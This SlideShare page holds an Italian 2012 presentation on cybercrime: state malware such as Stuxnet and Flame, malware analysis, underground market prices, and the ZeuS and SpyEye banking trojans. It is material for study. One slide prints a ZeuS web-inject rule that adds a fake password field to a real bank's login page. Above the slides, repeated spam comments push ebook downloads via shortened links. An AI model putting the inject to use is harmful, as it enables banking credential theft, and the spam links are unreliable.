Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Crimini Informatici 2012

2,117 views

Published on

  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m77EgH } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • accessibility Books Library allowing access to top content, including thousands of title from favorite author, plus the ability to read or download a huge selection of books for your pc or smartphone within minutes.........ACCESS WEBSITE Over for All Ebooks ..... (Unlimited) ......................................................................................................................... Download FULL PDF EBOOK here { https://urlzs.com/UABbn } .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Crimini Informatici 2012

  1. 1. Crimini Informatici 2012 Indagini Digitali in ambito Giudiziario e ForenseTerrorismo, spionaggio ed esercito di botnet. La cyberguerra è già in atto. Lesofisticate armi digitali, accuratamente progettate per colpire obiettivi specifici,rappresentano la minaccia più preoccupante che sia stata mai affrontata.
  2. 2. Who is?● Author: Gianni Amato● Site: www.securityside.it● Blog: www.gianniamato.it● Email: amato@securityside.it● Twitter: @guelfoweb IT Security and Forensics Consultant. Specialized in Cybercrime Intelligence for Internet Industry and Government Agencies.
  3. 3. Cosa è il Cybercrime● Un crimine come tutti gli altri, con laggiunta della componente informatica● La componente informatica può essere il mezzo o lobiettivo del crimine (o entrambi)
  4. 4. Cominciamo dalla Cyberwar
  5. 5. Lapocalisse Cosa comporterebbe un ipotetico cyber attacco alle infrastrutture critiche✔ Prenotazioni online di treni e aerei bloccate✔ Sistemi di controllo di linee aeree e treni in tilt✔ Le comunicazioni email interrotte✔ Caos nelle Pubbliche Amministrazioni✔ Raffinerie e Oleodotti fuori controllo✔ Acqua, gas, rete elettrica fuori uso
  6. 6. Terrorismo?● Si, è importante prestare attenzione a tutte le forme di terrorismo. In particolare al terrorismo psicologico.
  7. 7. Impossibile che accada?● No, la Cyberwar è già iniziata. Una guerra digitale tra nazioni notoriamente in contrasto. – 2010: Stuxnet – 2011: Duqu – 2011: Gauss – 2012: Mahdi – 2012: Flame – 2012: Wiper – 2012: Shamoon
  8. 8. Chi potrebbero essere gli artefici?● Chiunque! – Dai servizi segreti ai gruppi di estremisti – Dai militari ai terroristi – Nazioni in contrasto da anni
  9. 9. 2010: Stuxnet● Scoperto nel giugno 2010● Obiettivo: Sabotare il programma nucleare Iraniano – Sistemi SCADA ● Windows + WinCC + PCS 7● Progetto USA “Operation Olympic Games” iniziato da George W. Bush – Si diffonde via USB – Sfrutta vulnerabilità 0-day
  10. 10. 2010: Stuxnet● La password dei sistemi SCADA (DB WinCC) era conosciuta da oltre 2 anni. Fu pubblicata in un forum e poi rimossa dal moderatore● Gli autori erano in possesso di certificati digitali: Realtek e JMicron● Verisign revoca i certificati il 16 luglio● Il 17 luglio viene rilevata una nuova versione di Stuxnet con i certificati rubati a Jmicron
  11. 11. 2010: Stuxnet● Il valore numerico 1979050 trovato nel registro di sistema delle macchine compromesse da Stuxnet è stato interpretato come la possibile data di nascita di uno degli autori: 09/05/1979● E stato appurato che la data rilevata allinterno del codice di Stuxnet 24/6/12 coincide esattamente con la data del suo decesso
  12. 12. 2011: Duqu● Scoperto nel settembre 2011● Condivide codice di Stuxnet (?)● Il target ancora una volta è lIran: valutare lo stato del programma nucleare● Obiettivo diverso: furto di informazioni● Utilizza certificati rubati● Ha funzioni di keylogger● Sfrutta vulnerabilità 0-day (kernel Windows)
  13. 13. 2011: Gauss● Scoperto nel settembre 2011● Rilevato in Libano, Israele, Palestina, Stati Uniti e Emirati Arabi● Obiettivo: furto di password e conti bancari● Si ipotizza sia stato creato dagli stessi autori di Stuxnet e Duqu
  14. 14. 2012: Mahdi● Scoperto nel febbraio 2012● Il nome deriva da stringhe trovate nel codice che fanno riferimento al Messia Islamico● Non si conoscono gli autori● Ha funzioni di keylogger e cattura schermate● Ruba file audio, file di testo e immagini● Sfrutta bug di Word e Power Point
  15. 15. 2012: Flame● Scoperto nellaprile 2012● Individuato da Kaspersky Lab in Iran (Iranian Oil Minestry● CrySyS Lab sostiene che il malware potrebbe essere online dal 2007● Si propaga tramite USB Key, nella rete locale grazie ad una vulnerabilità di Windows nei sistemi con stampante condivisa● Usa un falso certificato digitale
  16. 16. 2012: Flame● Ha funzioni di keylogger● Cattura immagini● Registra laudio (conversazioni via Skype)● Ruba documenti di testo e file DWG (Progetti AutoCad)● Rilevate somiglianze con Stuxnet e Duqu ma con un obiettivo diverso: spionaggio industriale
  17. 17. 2012: Flame risale al 2008? http://www.crysys.hu/skywiper/skywiper.pdf● $ python peframe.py --export mssecmgr.ocx● [IMAGE_EXPORT_DIRECTORY]● 0x5F694 0x0 Characteristics: 0x0● 0x5F698 0x4 TimeDateStamp: 0x493EA336 [Tue Dec 9 16:56:22 2008 UTC]● 0x5F69C 0x8 MajorVersion: 0x0● 0x5F69E 0xA MinorVersion: 0x0● 0x5F6A0 0xC Name: 0x13C4EE● 0x5F6A4 0x10 Base: 0x1● 0x5F6A8 0x14 NumberOfFunctions: 0x5● 0x5F6AC 0x18 NumberOfNames: 0x5● 0x5F6B0 0x1C AddressOfFunctions: 0x13C4BC● 0x5F6B4 0x20 AddressOfNames: 0x13C4D0● 0x5F6B8 0x24 AddressOfNameOrdinals: 0x13C4E4
  18. 18. 2012: Wiper● Un soldato inviato sul campo di battaglia per ripulire le tracce● Ha lo scopo di cancellare tutte le tracce lasciate da Stuxnet e Duqu● La priorità di rimuovere le informazioni è data ai file .PNF (usati da Stuxnet)● Rimuove inoltre tutti dati utili ai tecnici forensi (non è un caso)
  19. 19. 2012: Shamoon● Scoperto nel mese di agosto 2012● Shamoon è il nome trovato nel codice● Progettato per lo spionaggio● Ha preso di mira un ente petrolifero di Stato Saudita● Cancella i dati del pc infetto sostituendoli con delle immagini (una bandiera americana)● I file originali vengono verso un server sconosciuto
  20. 20. Perchè analizzare un Malware?Lanalisi è una procedurache va eseguita inlaboratorio - quando èpossibile - e consente diricostruire la logica delmalware per rispondereai quattro quesiti che sipresentano quando unamacchina vienecompromessa.
  21. 21. I 4 Quesiti● 1. Qual è lo scopo del malware?● 2. Quali informazioni è riuscito a carpire?● 3. Dove sono state trasmesse le informazioni?● 4. Come ha fatto ad arrivare fin qui?
  22. 22. Con cosa abbiamo a che fare?● Persone altamente competenti● Codice è offuscato● Crittorgrafia (soprattutto durante la trasmissione dei dati)● Funzioni di rootkit● Vulnerabilità 0-day
  23. 23. Tipi di Analisi● Analisi Statica ● Analisi Dinamica – Codice – Comportamento – Signature – Mutazioni – Evidence – Connessioni
  24. 24. Remote Access Trojan
  25. 25. Malware Anti-Analysis● Anti Online-Analysis ● Anti Virtualizzation – ThreatExpert – VMware – CWSandbox – Virtualbox – Anubis – Virtual PC ● Anti Debug/Disass. – Softice – OllyDbg – IDA Pro
  26. 26. Torniamo al Cybercrime
  27. 27. Vulnerabilità Condivise
  28. 28. Acquisti nellUnderground Russo● Hacking a Gmail account: $162● Hacking a corporate mailbox: $500)● Scans of legitimate passports: $5 each● Winlocker ransomware: $10-20● Unintelligent exploit bundle: $25● Intelligent exploit bundle: $10-3,000● Traffic: $7-15 per 1,000 visitors for the most valuable traffic (from the US and EU)
  29. 29. Acquisti nellUnderground Russo● Basic crypter (for inserting rogue code into a benign file): $10-30● SOCKS bot (to get around firewalls): $100● Hiring a DDoS attack: $30-70 for a day, $1,200 for a month● Email spam: $10 per one million e-mails● Expensive email spam (using a customer database): $50-500 per one million e-mails
  30. 30. Acquisti nellUnderground Russo● SMS spam: $3-150 per 100-100,000 messages● Bots for a botnet: $200 for 2,000 bots● DDoS botnet: $700● ZeuS source code: $200-$500● Windows rootkit (for installing malicious drivers): $292● Hacking a Facebook or Twitter account: $130
  31. 31. ZeuSUn progetto criminale (ora) Open Source
  32. 32. ZeuS Info● Online dal 2006● Scritto in Visual C++● Gli autori non amano chiamarlo Trojan, Backdoor o Virus. Lo chiamano semplicemente “Bot”● Prende di mira i sistemi MS Windows● Basato sulle intercettazioni delle WinAPI
  33. 33. ZeuS Ring● Ring3 – Garantisce adattabilità e scalabilità – Può operare in Guest User
  34. 34. ZeuS Client Features● Sniffer di traffico su protocollo TCP● Intercettazione di login FTP● Intercettazione di login POP3● Intercetta le chiamate alla libreria Wininet.dll (usata da Internet Explorer) e nspr4.dll (usata da Firefox) per connessioni HTTP e HTTPS● Encryption 1024-bit RSA
  35. 35. ZeuS Server Features● Usa Socks 4/4a/5 con supporto UDP e IPv6● Connessioni alla macchina infetta via FTP o RDP● Screenshot in real time● Esecuzione comandi da remoto
  36. 36. ZeuS HTTP-inject/HTTP-grabber webinjects.txtset_url https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp GPdata_before name="PASSWORD"*<tr>data_end data_inject <td height="32" class="grigio10">password dispositiva <br/> <input name="PASSDIS" type="password" size="12" onkeypress="javascript:entsub(PASSWORD, event);" tabindex="2" style="width: 110px;"/></td> <td><img alt="" src="/static/i/spaziatore.gif" width="10"/></td> data_enddata_afterdata_end
  37. 37. ZeuS HTTP-inject/HTTP-grabber Before - After
  38. 38. ZeuS Installation ✔ Apache ✔ PHP ✔ MySql
  39. 39. ZeuS Control Panel
  40. 40. ZeuS Botnet
  41. 41. Arriva la Concorrenza La prima versione di SpyEye con opzione Kill Zeus Nato per accaparrarsi una fetta del mercato di ZeuS
  42. 42. SpyEye● Presente dal 2009● Progettato dai Russi● Ha un costo di 500$ al mercato nero● Il business maggiore è basato sui plugin
  43. 43. SpyEye + ZeuS● Brute force password guessing● Jabber notification● VNC module● Auto-spreading● Auto-update● Screenshot system
  44. 44. Domande?

×